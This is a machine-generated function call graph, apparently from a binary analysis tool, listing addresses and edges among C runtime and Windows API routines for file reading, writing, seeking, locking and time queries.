87851 4534e3 52 API calls 86996->87851 87847 403ea0 52 API calls __cinit 86997->87847 87850 4534e3 52 API calls 86998->87850 87849 4534e3 52 API calls 87000->87849 87007 40c2de 87001->87007 87848 4534e3 52 API calls 87001->87848 87007->86788 87007->87007 87009 401a30 87008->87009 87010 401a17 87008->87010 87012 402160 52 API calls 87009->87012 87011 401a2d 87010->87011 87852 403c30 52 API calls _memmove 87010->87852 87011->86792 87013 401a3d 87012->87013 87013->86792 87016 411523 87015->87016 87017 4114ba 87015->87017 87855 4113a8 58 API calls 3 library calls 87016->87855 87022 40200c 87017->87022 87853 417f77 46 API calls __getptd_noexit 87017->87853 87020 4114c6 87854 417f25 10 API calls __wcsnicmp_l 87020->87854 87022->86795 87022->86796 87023->86824 87024->86827 87025->86831 87026->86831 87028 4026f0 52 API calls 87027->87028 87029 401c97 87028->87029 87029->86956 87030->86966 87031->86965 87092 40f6f0 87032->87092 87034 40f77b _strcat moneypunct 87100 40f850 87034->87100 87039 427c2a 87130 414d04 87039->87130 87041 40f7fc 87041->87039 87043 40f804 87041->87043 87117 414a46 87043->87117 87047 40f80e 87047->86970 87051 4528bd 87047->87051 87048 427c59 87136 414fe2 87048->87136 87050 427c79 87052 4150d1 _fseek 81 API calls 87051->87052 87053 452930 87052->87053 87769 452719 87053->87769 87056 452948 87056->86972 87057 414d04 __fread_nolock 61 API calls 87058 452966 87057->87058 87059 414d04 __fread_nolock 61 API calls 87058->87059 87060 452976 87059->87060 87061 414d04 __fread_nolock 61 API calls 87060->87061 87062 45298f 87061->87062 87063 414d04 __fread_nolock 61 API calls 87062->87063 87064 4529aa 87063->87064 87065 4150d1 _fseek 81 API calls 87064->87065 87066 4529c4 87065->87066 87067 4135bb _malloc 46 API calls 87066->87067 87068 4529cf 87067->87068 87069 4135bb _malloc 46 API calls 87068->87069 87070 4529db 87069->87070 87071 414d04 __fread_nolock 61 API calls 87070->87071 87072 4529ec 87071->87072 87073 44afef GetSystemTimeAsFileTime 87072->87073 87074 452a00 87073->87074 87075 452a36 87074->87075 87076 452a13 87074->87076 87077 452aa5 87075->87077 87078 452a3c 87075->87078 87079 413748 _free 46 API calls 87076->87079 87081 413748 _free 46 API calls 87077->87081 87775 44b1a9 87078->87775 87082 452a1c 87079->87082 87085 452aa3 87081->87085 87083 413748 _free 46 API calls 87082->87083 87086 452a25 87083->87086 87084 452a9d 87087 413748 _free 46 API calls 87084->87087 87085->86972 87086->86972 87087->87085 87089 431e64 87088->87089 87090 431e6a 87088->87090 87091 414a46 __fcloseall 82 API calls 87089->87091 87090->86973 87091->87090 87093 425de2 87092->87093 87094 40f6fc _wcslen 87092->87094 87093->87034 87095 40f710 WideCharToMultiByte 87094->87095 87096 40f756 87095->87096 87097 40f728 87095->87097 87096->87034 87098 4115d7 52 API calls 87097->87098 87099 40f735 WideCharToMultiByte 87098->87099 87099->87034 87102 40f85d setSBCS _strlen 87100->87102 87101 426b3b 87102->87101 87104 40f7ab 87102->87104 87149 414db8 87102->87149 87105 4149c2 87104->87105 87320 414904 87105->87320 87107 40f7e9 87107->87039 87108 40f5c0 87107->87108 87109 40f5cd _strcat __write_nolock _memmove 87108->87109 87110 414d04 __fread_nolock 61 API calls 87109->87110 87112 425d11 87109->87112 87116 40f691 __tzset_nolock 87109->87116 87408 4150d1 87109->87408 87110->87109 87113 4150d1 _fseek 81 API calls 87112->87113 87114 425d33 87113->87114 87115 414d04 __fread_nolock 61 API calls 87114->87115 87115->87116 87116->87041 87118 414a52 __alloc_osfhnd 87117->87118 87119 414a64 87118->87119 87120 414a79 87118->87120 87528 417f77 46 API calls __getptd_noexit 87119->87528 87122 415471 __lock_file 47 API calls 87120->87122 87126 414a74 __alloc_osfhnd 87120->87126 87124 414a92 87122->87124 87123 414a69 87529 417f25 10 API calls __wcsnicmp_l 87123->87529 87512 4149d9 87124->87512 87126->87047 87597 414c76 87130->87597 87132 414d1c 87133 44afef 87132->87133 87762 442c5a 87133->87762 87135 44b00d 87135->87048 87137 414fee __alloc_osfhnd 87136->87137 87138 414ffa 87137->87138 87139 41500f 87137->87139 87766 417f77 46 API calls __getptd_noexit 87138->87766 87141 415471 __lock_file 47 API calls 87139->87141 87143 415017 87141->87143 87142 414fff 87767 417f25 10 API calls __wcsnicmp_l 87142->87767 87145 414e4e __ftell_nolock 51 API calls 87143->87145 87146 415024 87145->87146 87768 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87146->87768 87148 41500a __alloc_osfhnd 87148->87050 87150 414dd6 87149->87150 87151 414deb 87149->87151 87160 417f77 46 API calls __getptd_noexit 87150->87160 87151->87150 87153 414df2 87151->87153 87162 41b91b 79 API calls 11 library calls 87153->87162 87154 414ddb 87161 417f25 10 API calls __wcsnicmp_l 87154->87161 87157 414de6 87157->87102 87158 414e18 87158->87157 87163 418f98 87158->87163 87160->87154 87161->87157 87162->87158 87184 414139 87163->87184 87165 418fa8 87166 418fb3 87165->87166 87167 418fca 87165->87167 87194 417f77 46 API calls __getptd_noexit 87166->87194 87169 418fce 87167->87169 87178 418fdb __flswbuf 87167->87178 87195 417f77 46 API calls __getptd_noexit 87169->87195 87171 41903c 87172 4190cb 87171->87172 87173 41904b 87171->87173 87174 41b7b2 __write 77 API calls 87172->87174 87175 419062 87173->87175 87180 41907f 87173->87180 87177 418fb8 87174->87177 87205 41b7b2 87175->87205 87177->87157 87178->87171 87178->87177 87181 419031 87178->87181 87196 42064c 87178->87196 87180->87177 87230 420519 51 API calls 6 library calls 87180->87230 87181->87171 87191 420603 87181->87191 87185 414145 87184->87185 87186 41415a 87184->87186 87231 417f77 46 API calls __getptd_noexit 87185->87231 87186->87165 87188 41414a 87232 417f25 10 API calls __wcsnicmp_l 87188->87232 87190 414155 87190->87165 87192 416b04 __malloc_crt 46 API calls 87191->87192 87193 420618 87192->87193 87193->87171 87194->87177 87195->87177 87197 420668 87196->87197 87198 420659 87196->87198 87200 420686 87197->87200 87234 417f77 46 API calls __getptd_noexit 87197->87234 87233 417f77 46 API calls __getptd_noexit 87198->87233 87200->87181 87202 42065e 87202->87181 87203 420679 87235 417f25 10 API calls __wcsnicmp_l 87203->87235 87206 41b7be __alloc_osfhnd 87205->87206 87207 41b7e1 87206->87207 87208 41b7c6 87206->87208 87209 41b7ed 87207->87209 87214 41b827 87207->87214 87312 417f8a 46 API calls __getptd_noexit 87208->87312 87314 417f8a 46 API calls __getptd_noexit 87209->87314 87212 41b7cb 87313 417f77 46 API calls __getptd_noexit 87212->87313 87213 41b7f2 87315 417f77 46 API calls __getptd_noexit 87213->87315 87236 41ae56 87214->87236 87218 41b7d3 __alloc_osfhnd 87218->87177 87219 41b7fa 87316 417f25 10 API calls __wcsnicmp_l 87219->87316 87220 41b82d 87222 41b83b 87220->87222 87223 41b84f 87220->87223 87246 41b0b5 87222->87246 87317 417f77 46 API calls __getptd_noexit 87223->87317 87226 41b854 87318 417f8a 46 API calls __getptd_noexit 87226->87318 87227 41b847 87319 41b87e LeaveCriticalSection __unlock_fhandle 87227->87319 87230->87177 87231->87188 87232->87190 87233->87202 87234->87203 87235->87202 87237 41ae62 __alloc_osfhnd 87236->87237 87238 41aebc 87237->87238 87240 4182cb __lock 46 API calls 87237->87240 87239 41aec1 EnterCriticalSection 87238->87239 87241 41aede __alloc_osfhnd 87238->87241 87239->87241 87242 41ae8e 87240->87242 87241->87220 87243 41aeaa 87242->87243 87244 41ae97 InitializeCriticalSectionAndSpinCount 87242->87244 87245 41aeec ___lock_fhandle LeaveCriticalSection 87243->87245 87244->87243 87245->87238 87247 41b0c4 __write_nolock 87246->87247 87248 41b0ef 87247->87248 87249 41b119 87247->87249 87250 41b0fa 87247->87250 87251 41a208 __ld12tod 5 API calls 87248->87251 87254 41b175 87249->87254 87255 41b158 87249->87255 87252 417f8a __read_nolock 46 API calls 87250->87252 87253 41b7b0 87251->87253 87256 41b0ff 87252->87256 87253->87227 87258 41b18b 87254->87258 87259 41b17c 87254->87259 87257 417f8a __read_nolock 46 API calls 87255->87257 87260 417f77 __wcsnicmp_l 46 API calls 87256->87260 87262 41b15d 87257->87262 87261 42064c __flswbuf 46 API calls 87258->87261 87263 420494 __lseeki64_nolock 48 API calls 87259->87263 87264 41b106 87260->87264 87265 41b191 87261->87265 87266 417f77 __wcsnicmp_l 46 API calls 87262->87266 87267 41b188 87263->87267 87268 417f25 __wcsnicmp_l 10 API calls 87264->87268 87269 41b433 87265->87269 87274 417a69 __getptd 46 API calls 87265->87274 87270 41b165 87266->87270 87267->87258 87268->87248 87272 41b6e3 WriteFile 87269->87272 87273 41b442 87269->87273 87271 417f25 __wcsnicmp_l 10 API calls 87270->87271 87271->87248 87277 41b415 87272->87277 87278 41b716 GetLastError 87272->87278 87275 41b4fd 87273->87275 87282 41b455 87273->87282 87276 41b1ac GetConsoleMode 87274->87276 87286 41b50a 87275->87286 87291 41b5d7 87275->87291 87276->87269 87280 41b1d5 87276->87280 87277->87248 87279 41b761 87277->87279 87285 41b734 87277->87285 87278->87277 87279->87248 87284 417f77 __wcsnicmp_l 46 API calls 87279->87284 87280->87269 87281 41b1e5 GetConsoleCP 87280->87281 87281->87277 87309 41b208 87281->87309 87282->87279 87283 41b49f WriteFile 87282->87283 87283->87278 87289 41b4d3 87283->87289 87288 41b784 87284->87288 87292 41b753 87285->87292 87293 41b73f 87285->87293 87286->87279 87287 41b579 WriteFile 87286->87287 87287->87278 87295 41b5ad 87287->87295 87296 417f8a __read_nolock 46 API calls 87288->87296 87289->87277 87289->87282 87300 41b4f8 87289->87300 87290 41b648 WideCharToMultiByte 87290->87278 87298 41b67f WriteFile 87290->87298 87291->87279 87291->87290 87294 417f9d __dosmaperr 46 API calls 87292->87294 87297 417f77 __wcsnicmp_l 46 API calls 87293->87297 87294->87248 87295->87277 87295->87286 87295->87300 87296->87248 87301 41b744 87297->87301 87299 41b6b6 GetLastError 87298->87299 87304 41b6aa 87298->87304 87299->87304 87300->87277 87303 417f8a __read_nolock 46 API calls 87301->87303 87302 4131e9 __write_nolock 56 API calls 87302->87309 87303->87248 87304->87277 87304->87291 87304->87298 87304->87300 87305 41b2b4 WideCharToMultiByte 87305->87277 87307 41b2e5 WriteFile 87305->87307 87306 420955 58 API calls __fassign 87306->87309 87307->87278 87308 41b30c 87307->87308 87308->87277 87308->87278 87308->87309 87310 4221f0 WriteConsoleW CreateFileW __write_nolock 87308->87310 87311 41b339 WriteFile 87308->87311 87309->87277 87309->87302 87309->87305 87309->87306 87309->87308 87310->87308 87311->87278 87311->87308 87312->87212 87313->87218 87314->87213 87315->87219 87316->87218 87317->87226 87318->87227 87319->87218 87323 414910 __alloc_osfhnd 87320->87323 87321 414923 87376 417f77 46 API calls __getptd_noexit 87321->87376 87323->87321 87325 414951 87323->87325 87324 414928 87377 417f25 10 API calls __wcsnicmp_l 87324->87377 87339 41d4d1 87325->87339 87328 414956 87329 41496a 87328->87329 87330 41495d 87328->87330 87332 414992 87329->87332 87333 414972 87329->87333 87378 417f77 46 API calls __getptd_noexit 87330->87378 87356 41d218 87332->87356 87379 417f77 46 API calls __getptd_noexit 87333->87379 87335 414933 __alloc_osfhnd @_EH4_CallFilterFunc@8 87335->87107 87340 41d4dd __alloc_osfhnd 87339->87340 87341 4182cb __lock 46 API calls 87340->87341 87354 41d4eb 87341->87354 87342 41d560 87381 41d5fb 87342->87381 87343 41d567 87345 416b04 __malloc_crt 46 API calls 87343->87345 87347 41d56e 87345->87347 87346 41d5f0 __alloc_osfhnd 87346->87328 87347->87342 87348 41d57c InitializeCriticalSectionAndSpinCount 87347->87348 87351 41d59c 87348->87351 87352 41d5af EnterCriticalSection 87348->87352 87349 418209 __mtinitlocknum 46 API calls 87349->87354 87353 413748 _free 46 API calls 87351->87353 87352->87342 87353->87342 87354->87342 87354->87343 87354->87349 87384 4154b2 47 API calls __lock 87354->87384 87385 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87354->87385 87357 41d23a 87356->87357 87358 41d255 87357->87358 87370 41d26c __wopenfile 87357->87370 87390 417f77 46 API calls __getptd_noexit 87358->87390 87359 41d421 87362 41d47a 87359->87362 87363 41d48c 87359->87363 87361 41d25a 87391 417f25 10 API calls __wcsnicmp_l 87361->87391 87395 417f77 46 API calls __getptd_noexit 87362->87395 87387 422bf9 87363->87387 87367 41d47f 87396 417f25 10 API calls __wcsnicmp_l 87367->87396 87368 41499d 87380 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87368->87380 87370->87359 87370->87362 87392 41341f 58 API calls __wcsnicmp_l 87370->87392 87372 41d41a 87372->87359 87393 41341f 58 API calls __wcsnicmp_l 87372->87393 87374 41d439 87374->87359 87394 41341f 58 API calls __wcsnicmp_l 87374->87394 87376->87324 87377->87335 87378->87335 87379->87335 87380->87335 87386 4181f2 LeaveCriticalSection 87381->87386 87383 41d602 87383->87346 87384->87354 87385->87354 87386->87383 87397 422b35 87387->87397 87389 422c14 87389->87368 87390->87361 87391->87368 87392->87372 87393->87374 87394->87359 87395->87367 87396->87368 87398 422b41 __alloc_osfhnd 87397->87398 87399 422b54 87398->87399 87401 422b8a 87398->87401 87400 417f77 __wcsnicmp_l 46 API calls 87399->87400 87402 422b59 87400->87402 87403 422400 __tsopen_nolock 109 API calls 87401->87403 87404 417f25 __wcsnicmp_l 10 API calls 87402->87404 87405 422ba4 87403->87405 87407 422b63 __alloc_osfhnd 87404->87407 87406 422bcb __wsopen_helper LeaveCriticalSection 87405->87406 87406->87407 87407->87389 87411 4150dd __alloc_osfhnd 87408->87411 87409 4150e9 87439 417f77 46 API calls __getptd_noexit 87409->87439 87411->87409 87412 41510f 87411->87412 87421 415471 87412->87421 87414 4150ee 87440 417f25 10 API calls __wcsnicmp_l 87414->87440 87418 4150f9 __alloc_osfhnd 87418->87109 87422 415483 87421->87422 87423 4154a5 EnterCriticalSection 87421->87423 87422->87423 87424 41548b 87422->87424 87425 415117 87423->87425 87426 4182cb __lock 46 API calls 87424->87426 87427 415047 87425->87427 87426->87425 87428 415067 87427->87428 87429 415057 87427->87429 87434 415079 87428->87434 87442 414e4e 87428->87442 87490 417f77 46 API calls __getptd_noexit 87429->87490 87433 41505c 87441 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87433->87441 87459 41443c 87434->87459 87436 414139 __fseek_nolock 46 API calls 87437 4150b9 87436->87437 87465 41e1f4 87437->87465 87439->87414 87440->87418 87441->87418 87443 414e61 87442->87443 87444 414e79 87442->87444 87491 417f77 46 API calls __getptd_noexit 87443->87491 87446 414139 __fseek_nolock 46 API calls 87444->87446 87448 414e80 87446->87448 87447 414e66 87492 417f25 10 API calls __wcsnicmp_l 87447->87492 87450 41e1f4 __write 51 API calls 87448->87450 87451 414e97 87450->87451 87452 414f09 87451->87452 87454 414ec9 87451->87454 87458 414e71 87451->87458 87493 417f77 46 API calls __getptd_noexit 87452->87493 87455 41e1f4 __write 51 API calls 87454->87455 87454->87458 87456 414f64 87455->87456 87457 41e1f4 __write 51 API calls 87456->87457 87456->87458 87457->87458 87458->87434 87460 414477 87459->87460 87461 414455 87459->87461 87460->87436 87461->87460 87462 414139 __fseek_nolock 46 API calls 87461->87462 87463 414470 87462->87463 87464 41b7b2 __write 77 API calls 87463->87464 87464->87460 87466 41e200 __alloc_osfhnd 87465->87466 87467 41e223 87466->87467 87468 41e208 87466->87468 87470 41e22f 87467->87470 87473 41e269 87467->87473 87504 417f8a 46 API calls __getptd_noexit 87468->87504 87506 417f8a 46 API calls __getptd_noexit 87470->87506 87471 41e20d 87505 417f77 46 API calls __getptd_noexit 87471->87505 87476 41ae56 ___lock_fhandle 48 API calls 87473->87476 87475 41e234 87507 417f77 46 API calls __getptd_noexit 87475->87507 87480 41e26f 87476->87480 87477 41e215 __alloc_osfhnd 87477->87433 87479 41e23c 87508 417f25 10 API calls __wcsnicmp_l 87479->87508 87482 41e291 87480->87482 87483 41e27d 87480->87483 87509 417f77 46 API calls __getptd_noexit 87482->87509 87494 41e17f 87483->87494 87486 41e289 87511 41e2c0 LeaveCriticalSection __unlock_fhandle 87486->87511 87487 41e296 87510 417f8a 46 API calls __getptd_noexit 87487->87510 87490->87433 87491->87447 87492->87458 87493->87458 87495 41aded __chsize_nolock 46 API calls 87494->87495 87496 41e18e 87495->87496 87497 41e1a4 SetFilePointer 87496->87497 87498 41e194 87496->87498 87500 41e1c3 87497->87500 87501 41e1bb GetLastError 87497->87501 87499 417f77 __wcsnicmp_l 46 API calls 87498->87499 87503 41e199 87499->87503 87502 417f9d __dosmaperr 46 API calls 87500->87502 87500->87503 87501->87500 87502->87503 87503->87486 87504->87471 87505->87477 87506->87475 87507->87479 87508->87477 87509->87487 87510->87486 87511->87477 87513 4149ea 87512->87513 87514 4149fe 87512->87514 87558 417f77 46 API calls __getptd_noexit 87513->87558 87515 4149fa 87514->87515 87517 41443c __flush 77 API calls 87514->87517 87530 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87515->87530 87519 414a0a 87517->87519 87518 4149ef 87559 417f25 10 API calls __wcsnicmp_l 87518->87559 87531 41d8c2 87519->87531 87523 414139 __fseek_nolock 46 API calls 87524 414a18 87523->87524 87535 41d7fe 87524->87535 87526 414a1e 87526->87515 87527 413748 _free 46 API calls 87526->87527 87527->87515 87528->87123 87529->87126 87530->87126 87532 414a12 87531->87532 87533 41d8d2 87531->87533 87532->87523 87533->87532 87534 413748 _free 46 API calls 87533->87534 87534->87532 87536 41d80a __alloc_osfhnd 87535->87536 87537 41d812 87536->87537 87538 41d82d 87536->87538 87575 417f8a 46 API calls __getptd_noexit 87537->87575 87540 41d839 87538->87540 87544 41d873 87538->87544 87577 417f8a 46 API calls __getptd_noexit 87540->87577 87542 41d817 87576 417f77 46 API calls __getptd_noexit 87542->87576 87543 41d83e 87578 417f77 46 API calls __getptd_noexit 87543->87578 87547 41ae56 ___lock_fhandle 48 API calls 87544->87547 87550 41d879 87547->87550 87548 41d81f __alloc_osfhnd 87548->87526 87549 41d846 87579 417f25 10 API calls __wcsnicmp_l 87549->87579 87552 41d893 87550->87552 87553 41d887 87550->87553 87580 417f77 46 API calls __getptd_noexit 87552->87580 87560 41d762 87553->87560 87556 41d88d 87581 41d8ba LeaveCriticalSection __unlock_fhandle 87556->87581 87558->87518 87559->87515 87582 41aded 87560->87582 87562 41d7c8 87595 41ad67 47 API calls 2 library calls 87562->87595 87564 41d772 87564->87562 87566 41aded __chsize_nolock 46 API calls 87564->87566 87574 41d7a6 87564->87574 87565 41d7d0 87571 41d7f2 87565->87571 87596 417f9d 46 API calls 3 library calls 87565->87596 87568 41d79d 87566->87568 87567 41aded __chsize_nolock 46 API calls 87569 41d7b2 CloseHandle 87567->87569 87572 41aded __chsize_nolock 46 API calls 87568->87572 87569->87562 87573 41d7be GetLastError 87569->87573 87571->87556 87572->87574 87573->87562 87574->87562 87574->87567 87575->87542 87576->87548 87577->87543 87578->87549 87579->87548 87580->87556 87581->87548 87583 41ae12 87582->87583 87584 41adfa 87582->87584 87587 417f8a __read_nolock 46 API calls 87583->87587 87589 41ae51 87583->87589 87585 417f8a __read_nolock 46 API calls 87584->87585 87586 41adff 87585->87586 87590 417f77 __wcsnicmp_l 46 API calls 87586->87590 87588 41ae23 87587->87588 87591 417f77 __wcsnicmp_l 46 API calls 87588->87591 87589->87564 87594 41ae07 87590->87594 87592 41ae2b 87591->87592 87593 417f25 __wcsnicmp_l 10 API calls 87592->87593 87593->87594 87594->87564 87595->87565 87596->87571 87598 414c82 __alloc_osfhnd 87597->87598 87599 414cc3 87598->87599 87600 414cbb __alloc_osfhnd 87598->87600 87604 414c96 setSBCS 87598->87604 87601 415471 __lock_file 47 API calls 87599->87601 87600->87132 87603 414ccb 87601->87603 87610 414aba 87603->87610 87624 417f77 46 API calls __getptd_noexit 87604->87624 87605 414cb0 87625 417f25 10 API calls __wcsnicmp_l 87605->87625 87611 414ad8 setSBCS 87610->87611 87616 414af2 87610->87616 87612 414ae2 87611->87612 87611->87616 87621 414b2d 87611->87621 87677 417f77 46 API calls __getptd_noexit 87612->87677 87614 414ae7 87678 417f25 10 API calls __wcsnicmp_l 87614->87678 87626 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87616->87626 87618 414c38 setSBCS 87680 417f77 46 API calls __getptd_noexit 87618->87680 87619 414139 __fseek_nolock 46 API calls 87619->87621 87621->87616 87621->87618 87621->87619 87627 41dfcc 87621->87627 87657 41d8f3 87621->87657 87679 41e0c2 46 API calls 3 library calls 87621->87679 87624->87605 87625->87600 87626->87600 87628 41dfd8 __alloc_osfhnd 87627->87628 87629 41dfe0 87628->87629 87630 41dffb 87628->87630 87750 417f8a 46 API calls __getptd_noexit 87629->87750 87632 41e007 87630->87632 87635 41e041 87630->87635 87752 417f8a 46 API calls __getptd_noexit 87632->87752 87633 41dfe5 87751 417f77 46 API calls __getptd_noexit 87633->87751 87638 41e063 87635->87638 87639 41e04e 87635->87639 87637 41e00c 87753 417f77 46 API calls __getptd_noexit 87637->87753 87642 41ae56 ___lock_fhandle 48 API calls 87638->87642 87755 417f8a 46 API calls __getptd_noexit 87639->87755 87645 41e069 87642->87645 87643 41e014 87754 417f25 10 API calls __wcsnicmp_l 87643->87754 87644 41e053 87756 417f77 46 API calls __getptd_noexit 87644->87756 87649 41e077 87645->87649 87650 41e08b 87645->87650 87648 41dfed __alloc_osfhnd 87648->87621 87681 41da15 87649->87681 87757 417f77 46 API calls __getptd_noexit 87650->87757 87653 41e090 87758 417f8a 46 API calls __getptd_noexit 87653->87758 87654 41e083 87759 41e0ba LeaveCriticalSection __unlock_fhandle 87654->87759 87658 41d900 87657->87658 87662 41d915 87657->87662 87760 417f77 46 API calls __getptd_noexit 87658->87760 87660 41d905 87761 417f25 10 API calls __wcsnicmp_l 87660->87761 87663 41d94a 87662->87663 87664 420603 __getbuf 46 API calls 87662->87664 87671 41d910 87662->87671 87665 414139 __fseek_nolock 46 API calls 87663->87665 87664->87663 87666 41d95e 87665->87666 87667 41dfcc __read 59 API calls 87666->87667 87668 41d965 87667->87668 87669 414139 __fseek_nolock 46 API calls 87668->87669 87668->87671 87670 41d988 87669->87670 87670->87671 87672 414139 __fseek_nolock 46 API calls 87670->87672 87671->87621 87673 41d994 87672->87673 87673->87671 87674 414139 __fseek_nolock 46 API calls 87673->87674 87675 41d9a1 87674->87675 87676 414139 __fseek_nolock 46 API calls 87675->87676 87676->87671 87677->87614 87678->87616 87679->87621 87680->87614 87682 41da31 87681->87682 87683 41da4c 87681->87683 87684 417f8a __read_nolock 46 API calls 87682->87684 87685 41da5b 87683->87685 87688 41da7a 87683->87688 87687 41da36 87684->87687 87686 417f8a __read_nolock 46 API calls 87685->87686 87689 41da60 87686->87689 87691 417f77 __wcsnicmp_l 46 API calls 87687->87691 87690 41da98 87688->87690 87701 41daac 87688->87701 87692 417f77 __wcsnicmp_l 46 API calls 87689->87692 87693 417f8a __read_nolock 46 API calls 87690->87693 87702 41da3e 87691->87702 87695 41da67 87692->87695 87697 41da9d 87693->87697 87694 41db02 87696 417f8a __read_nolock 46 API calls 87694->87696 87698 417f25 __wcsnicmp_l 10 API calls 87695->87698 87699 41db07 87696->87699 87700 417f77 __wcsnicmp_l 46 API calls 87697->87700 87698->87702 87703 417f77 __wcsnicmp_l 46 API calls 87699->87703 87704 41daa4 87700->87704 87701->87694 87701->87702 87705 41dae1 87701->87705 87706 41db1b 87701->87706 87702->87654 87703->87704 87707 417f25 __wcsnicmp_l 10 API calls 87704->87707 87705->87694 87713 41daec ReadFile 87705->87713 87708 416b04 __malloc_crt 46 API calls 87706->87708 87707->87702 87710 41db31 87708->87710 87716 41db59 87710->87716 87717 41db3b 87710->87717 87711 41dc17 87712 41df8f GetLastError 87711->87712 87720 41dc2b 87711->87720 87714 41de16 87712->87714 87715 41df9c 87712->87715 87713->87711 87713->87712 87724 417f9d __dosmaperr 46 API calls 87714->87724 87745 41dd9b 87714->87745 87718 417f77 __wcsnicmp_l 46 API calls 87715->87718 87721 420494 __lseeki64_nolock 48 API calls 87716->87721 87719 417f77 __wcsnicmp_l 46 API calls 87717->87719 87722 41dfa1 87718->87722 87723 41db40 87719->87723 87728 41dc47 87720->87728 87737 41de5b 87720->87737 87720->87745 87725 41db67 87721->87725 87726 417f8a __read_nolock 46 API calls 87722->87726 87727 417f8a __read_nolock 46 API calls 87723->87727 87724->87745 87725->87713 87726->87745 87727->87702 87730 41dcab ReadFile 87728->87730 87735 41dd28 87728->87735 87729 413748 _free 46 API calls 87729->87702 87732 41dcc9 GetLastError 87730->87732 87742 41dcd3 87730->87742 87731 41ded0 ReadFile 87733 41deef GetLastError 87731->87733 87740 41def9 87731->87740 87732->87728 87732->87742 87733->87737 87733->87740 87734 41ddec MultiByteToWideChar 87736 41de10 GetLastError 87734->87736 87734->87745 87738 41dda3 87735->87738 87739 41dd96 87735->87739 87735->87745 87746 41dd60 87735->87746 87736->87714 87737->87731 87737->87745 87738->87746 87747 41ddda 87738->87747 87741 417f77 __wcsnicmp_l 46 API calls 87739->87741 87740->87737 87744 420494 __lseeki64_nolock 48 API calls 87740->87744 87741->87745 87742->87728 87743 420494 __lseeki64_nolock 48 API calls 87742->87743 87743->87742 87744->87740 87745->87702 87745->87729 87746->87734 87748 420494 __lseeki64_nolock 48 API calls 87747->87748 87749 41dde9 87748->87749 87749->87734 87750->87633 87751->87648 87752->87637 87753->87643 87754->87648 87755->87644 87756->87643 87757->87653 87758->87654 87759->87648 87760->87660 87761->87671 87765 4148b3 GetSystemTimeAsFileTime __aulldiv 87762->87765 87764 442c6b 87764->87135 87765->87764 87766->87142 87767->87148 87768->87148 87772 45272f __tzset_nolock _wcscpy 87769->87772 87770 44afef GetSystemTimeAsFileTime 87770->87772 87771 4528a4 87771->87056 87771->87057 87772->87770 87772->87771 87773 414d04 61 API calls __fread_nolock 87772->87773 87774 4150d1 81 API calls _fseek 87772->87774 87773->87772 87774->87772 87776 44b1bc 87775->87776 87777 44b1ca 87775->87777 87778 4149c2 116 API calls 87776->87778 87779 44b1e1 87777->87779 87780 44b1d8 87777->87780 87781 4149c2 116 API calls 87777->87781 87778->87777 87810 4321a4 87779->87810 87780->87084 87783 44b2db 87781->87783 87783->87779 87785 44b2e9 87783->87785 87784 44b224 87786 44b253 87784->87786 87787 44b228 87784->87787 87788 44b2f6 87785->87788 87790 414a46 __fcloseall 82 API calls 87785->87790 87814 43213d 87786->87814 87789 44b235 87787->87789 87793 414a46 __fcloseall 82 API calls 87787->87793 87788->87084 87794 44b245 87789->87794 87797 414a46 __fcloseall 82 API calls 87789->87797 87790->87788 87792 44b25a 87795 44b260 87792->87795 87796 44b289 87792->87796 87793->87789 87794->87084 87798 44b26d 87795->87798 87800 414a46 __fcloseall 82 API calls 87795->87800 87824 44b0bf 87796->87824 87797->87794 87801 44b27d 87798->87801 87803 414a46 __fcloseall 82 API calls 87798->87803 87800->87798 87801->87084 87802 44b28f 87833 4320f8 87802->87833 87803->87801 87806 44b2a2 87808 44b2b2 87806->87808 87809 414a46 __fcloseall 82 API calls 87806->87809 87807 414a46 __fcloseall 82 API calls 87807->87806 87808->87084 87809->87808 87811 4321b4 __tzset_nolock _memmove 87810->87811 87812 4321cb 87810->87812 87811->87784 87813 414d04 __fread_nolock 61 API calls 87812->87813 87813->87811 87815 4135bb _malloc 46 API calls 87814->87815 87816 432150 87815->87816 87817 4135bb _malloc 46 API calls 87816->87817 87818 432162 87817->87818 87819 4135bb _malloc 46 API calls 87818->87819 87820 432174 87819->87820 87821 4320f8 46 API calls 87820->87821 87822 432189 87820->87822 87823 432198 87821->87823 87822->87792 87823->87792 87825 44b18e 87824->87825 87832 44b0da 87824->87832 87843 43206e 79 API calls 87825->87843 87827 442caf 61 API calls 87827->87832 87828 44b194 87828->87802 87831 44b19d 87831->87802 87832->87825 87832->87827 87832->87831 87841 44b040 61 API calls 87832->87841 87842 442d48 79 API calls 87832->87842 87834 43210f 87833->87834 87835 432109 87833->87835 87837 432122 87834->87837 87839 413748 _free 46 API calls 87834->87839 87836 413748 _free 46 API calls 87835->87836 87836->87834 87838 432135 87837->87838 87840 413748 _free 46 API calls 87837->87840 87838->87806 87838->87807 87839->87837 87840->87838 87841->87832 87842->87832 87843->87828 87844->86985 87845->86989 87846->87007 87847->87007 87848->87007 87849->86998 87850->87007 87851->87007 87852->87011 87853->87020 87854->87022 87855->87022 87905 410160 87856->87905 87858 41012f GetFullPathNameW 87859 410147 moneypunct 87858->87859 87859->86841 87861 4102cb SHGetDesktopFolder 87860->87861 87864 410333 _wcsncpy 87860->87864 87862 4102e0 _wcsncpy 87861->87862 87861->87864 87863 41031c SHGetPathFromIDListW 87862->87863 87862->87864 87863->87864 87864->86844 87866 4101bb 87865->87866 87870 425f4a 87865->87870 87867 410160 52 API calls 87866->87867 87869 4101c7 87867->87869 87868 4114ab __wcsicoll 58 API calls 87868->87870 87909 410200 52 API calls 2 library calls 87869->87909 87870->87868 87872 425f6e 87870->87872 87872->86846 87873 4101d6 87910 410200 52 API calls 2 library calls 87873->87910 87875 4101e9 87875->86846 87877 40f760 128 API calls 87876->87877 87878 40f584 87877->87878 87879 429335 87878->87879 87880 40f58c 87878->87880 87881 4528bd 118 API calls 87879->87881 87882 40f598 87880->87882 87883 429358 87880->87883 87884 42934b 87881->87884 87935 4033c0 113 API calls 7 library calls 87882->87935 87936 434034 86 API calls _wprintf 87883->87936 87887 429373 87884->87887 87888 42934f 87884->87888 87892 4115d7 52 API calls 87887->87892 87891 431e58 82 API calls 87888->87891 87889 429369 87889->87887 87890 40f5b4 87890->86842 87891->87883 87904 4293c5 moneypunct 87892->87904 87893 42959c 87894 413748 _free 46 API calls 87893->87894 87895 4295a5 87894->87895 87896 431e58 82 API calls 87895->87896 